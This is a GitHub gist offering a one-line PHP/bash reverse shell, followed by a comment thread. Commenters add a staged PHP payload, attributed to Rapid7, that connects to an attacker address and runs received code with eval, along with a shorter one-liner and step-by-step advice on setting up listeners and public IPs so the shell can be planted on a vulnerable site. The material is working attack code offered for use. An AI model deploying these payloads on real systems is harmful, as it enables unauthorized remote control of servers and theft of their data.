Skip to content

Instantly share code, notes, and snippets.

@rshipp
Created July 17, 2014 15:06
Show Gist options
  • Save rshipp/eee36684db07d234c1cc to your computer and use it in GitHub Desktop.
Save rshipp/eee36684db07d234c1cc to your computer and use it in GitHub Desktop.
A tiny PHP/bash reverse shell.
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
@nikkolai14
Copy link

@Serux

Thanks for the comment If I understand you correctly,

Here is my steps what I did,

  1. I use ngrok to publicly access my local site on the internet
  2. I start the nc in my terminal nc -nvlp 8080
  3. from the php script I use my physical ip then 8080
  4. I inject that remote url from a vuln site.
  5. the nc is now connected to that but the problem is that when I do commands it is on the webserver where I host my remote url

So what I want to achieve is access the vuln site using the reverse shell, I am still a beginner so forgive for that. is that possible?

thank you so much.

@Serux
Copy link

Serux commented May 8, 2020

@nikkolai14

I had to search what was ngrok.

So ngrok makes a localhost port public, like localhost:3000->publicweb.ngrok.io, so at this point you have something like a public subdomain and a public ip that forwards the connections to your localhost.

So when you execute the php script, it runs on the server that hosts the file (localhost) and tries to connect to the desired ip.

If your ip is in the same network as the server, (or your routing table is configured to forward to another network) the server tries to make the connection serverip->yourcomputerip:8080

So the php is being executed in your server, not in another site. The file needs to be executed from the server that you want to conect to, so that the php in that system executes the bash command.

So if that other server (remote url) executes that php( you upload the file and open the url) , you would need a public IP, because that server is on the internet and cannot find your physical ip. In this case you would need a public Ip.

I hope this helps. Ask me if there is something that you dont understand.
I'm writing this on my phone and is a bit difficult to structure the text.

@nikkolai14
Copy link

@Serux

Thanks you so much for the reply. I'll try again about the public IP.

@dbstreif
Copy link

dbstreif commented May 30, 2020

This will work with any operating system on a server. This is a module from Rapid7 that should be used with their handler but you don't have to. Keep in mind this is a staged payload.
/*<?php /**/ error_reporting(0); $ip = 'PUT YOUR IP'; $port = PUT YOUR PORT; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

@Cvar1984
Copy link

Cvar1984 commented Apr 7, 2022

it was bash not a php

@SergioChicoITCL
Copy link

it was bash not a php
@Cvar1984

It uses PHP to call a system command that opens a TCP socket that serves a bash shell to an IP/port.
Then you can connect to that IP/port and get access to this bash shell.
The script from the first post only works in unix-based OS with bash shell executable in the "/bin/" path.

@Cvar1984
Copy link

Cvar1984 commented Apr 7, 2022

it was bash not a php
@Cvar1984

It uses PHP to call a system command that opens a TCP socket that serves a bash shell to an IP/port. Then you can connect to that IP/port and get access to this bash shell. The script from the first post only works in unix-based OS with bash shell executable in the "/bin/" path.

Yea i know it spawn bash using php system call

@Cvar1984
Copy link

Cvar1984 commented Apr 7, 2022

Then this is the tiniest

<?=`"/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"`?>

@dbstreif
Copy link

dbstreif commented Apr 7, 2022

it was bash not a php
@Cvar1984

It uses PHP to call a system command that opens a TCP socket that serves a bash shell to an IP/port. Then you can connect to that IP/port and get access to this bash shell. The script from the first post only works in unix-based OS with bash shell executable in the "/bin/" path.

Yea i know it spawn bash using php system call

Yes but the solution from rapid7 works on any operating system because it does not utilize any system calls.

@85406043
Copy link

85406043 commented Jun 5, 2022

eu não sei qual ip usar, alguém me ajuda por gentileza !

@85406043
Copy link

85406043 commented Jun 5, 2022

estou em vpn ! em uma maquina virtual ! eu não sei se uso o da conexão vpn, da maquina virtualizada ou da minha propria maquina !

@SergioChicoITCL
Copy link

estou em vpn ! em uma maquina virtual ! eu não sei se uso o da conexão vpn, da maquina virtualizada ou da minha propria maquina !

@85406043

  1. You have two machines, the attacker and the victim. The victim must have network access to the attacker. (Same network, if you are in a VPN , both machines must be in that network, and those are the important IPs )
  2. You have to open a listening port in your attacking machine, (nc -nvlp 1234)
  3. You have to open a reverse shell, and point it to your attacking machine (VPN IP and open listening port)

And thats all.

@85406043
Copy link

85406043 commented Jun 6, 2022

@SergioChicoITCL muito obrigado campeão ! você é demais !

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment